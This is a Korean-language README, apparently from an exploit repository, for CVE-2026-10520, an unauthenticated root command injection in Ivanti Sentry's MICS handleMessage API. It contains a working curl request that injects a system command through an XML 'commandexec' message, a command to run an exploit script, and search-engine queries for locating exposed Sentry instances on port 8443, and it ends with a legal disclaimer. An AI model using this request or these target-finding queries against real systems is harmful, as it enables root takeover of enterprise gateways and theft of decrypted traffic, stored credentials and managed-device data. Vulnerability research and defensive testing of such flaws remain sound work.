
Ivanti Sentry에서 OS 명령 삽입을 통한 루트 수준 RCE
Ivanti Sentry (이전 명칭 MobileIron Sentry)는 모바일 디바이스와 기업 백엔드 리소스(이메일, SharePoint, 내부 웹 애플리케이션) 간의 트래픽을 프록시하는 엔터프라이즈 보안 게이트웨이입니다. 모바일 디바이스 관리(MDM) 정책을 시행하고, 암호화된 모바일 세션을 종료하며, 엔터프라이즈 앱 배포를 위한 인증서 기반 인증을 발급합니다. Sentry 인스턴스는 일반적으로 포트8443에서 인터넷에 노출되어 MICS(Mobile Iron Configuration Service) 관리 API를 제공합니다.
CVE-2026-10520은 Ivanti Sentry R10.5.2, R10.6.2, R10.7.1 이전 버전에 영향을 미치는 인증 없는 OS 명령 주입 취약점입니다(CVSSv3.1: 10 Critical, CISA KEV 등재). 이 결함은 MICS API 엔드포인트 /mics/api/v2/sentry/mics-config/handleMessage에 존재하며, 이 엔드포인트는 인증이나 입력 검증 없이 URL 인코딩된 message POST 본문을 통해 XML로 래핑된 시스템 명령을 수용합니다. 취약한 엔드포인트에 접근할 수 있는 공격자는 root 권한으로 임의의 OS 명령을 실행하여 호스트에 대한 완전한 제어권을 획득할 수 있습니다. 여기에는 복호화된 엔터프라이즈 트래픽, 저장된 자격 증명, 관리되는 모든 모바일 디바이스 데이터가 포함됩니다.
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: close" \
--data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"
python CVE-2026-10520-X7.py
title:"Ivanti System Manager: Sign In"body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443이 리포지토리와 그 내용은 합법적인 보안 연구, 승인된 침투 테스트, 교육용 연구, 방어 목적으로만 제공됩니다. 이 자료를 접근하거나 사용함으로써 귀하는 귀하의 활동이 모든 관련 법률을 준수하고, 귀하가 소유하지 않은 시스템을 테스트하거나 이 기술을 적용하기 전에 적절한 승인을 받았음을 전적으로 인정합니다.
이 프로젝트의 저자와 유지관리자는 이 정보의 적용으로 인한 손해, 법적 결과 또는 오용에 대해 어떠한 책임도 지지 않습니다. 승인되지 않은 접근, 악의적인 활동 또는 불법적인 목적을 위한 사용은 명시적으로 금지되며 지원되지 않습니다.
책임 있게 사용하십시오. 합법을 유지하십시오. 귀하가 소유하거나 명시적인 서면 허가를 받은 시스템만 테스트하십시오.
SCT-PL